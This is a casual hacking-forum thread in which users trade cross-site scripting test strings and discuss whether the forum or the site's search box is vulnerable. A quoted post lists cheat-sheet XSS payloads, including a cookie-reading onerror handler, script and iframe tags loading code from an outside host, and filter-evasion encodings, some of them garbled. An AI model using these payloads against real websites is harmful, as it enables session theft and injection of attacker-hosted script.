oh cool so thats how you inject it huh like <img src="javascript:alert("LIKE THIS?")">
Printable View
oh cool so thats how you inject it huh like <img src="javascript:alert("LIKE THIS?")">
<img src='javascript:alert("HELLO")'>
Yeah, but these forums aren't vulnerable
Put this in your web browser's address bar
[CODE]
javascript:alert("Hello");[/CODE]
A popup shoudl come up saying Hello. Injections can use any javascript code, it just has to be sytaxed a little differently.
oh ok ya i nkow a lol bit of java lol thats how u got my password
Good nIght guys :rolleyes:
[QUOTE=Moonbat]Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up
<img src='john.jpg' onerror='alert(document.cookie)'>
Here's one I found online
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<IMG SRC=javascript:alert("XSS")>
Yet again
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>
Differnet encodings: should output alert(xss) or whatever
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=�*06�*7�**8�*7�**5�**�**4�*05�**2�**6:�*7�*08�*0*�**4�**6(�**X**�***>
<IMG SRC=j*v***r*pt&#x*A*lert('X**'*>
<IMG SRC="jav ascript:alert('XSS');">
Using perl thngy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<iframe src=http://ha.ckers.org/scriptlet.html>[/QUOTE]
I'm sure I explained about this before.
The vulnerability I found was in the search box of this website (the box in the top right of the page, next to 'latest news'), and is part of the actual website.
The vBulletin forum we are posting in now has not been coded by the makers of this website, and has no relation to a bug in the website's programming. In other words, there is a vulnerability in this website's search box, but not the forum. vBulletin is a professional forum package and is mostly free of bugs. When hundreds of thousands of people rely on it for discussions, it has a certain responsibility to protect its users. Searching for vulnerabilities in forums is totally pointless.
Forum = created by vBulletin staff.
All-nettools.com = created by all-nettools.com staff.
If a member of all-nettools staff creates a programming error, the forum remains unchanged because he didn't create the forum.
[QUOTE]It can let you run JavaScript commands on a website as if they were coming from the server.[/QUOTE]
XSS vulnerabilities allow you to send users custom content when they request a page. The vulnerabilities allow you to inject code into a user's page. They are client-side, and have no impact on the server itself.
Ah, well, I got that definition from another site anyway.
I know you told me about this before, I just wanted to keep trying. If everyone assumed everything was secure, and didn't try to find a hole in the security, hacking would cease to exist.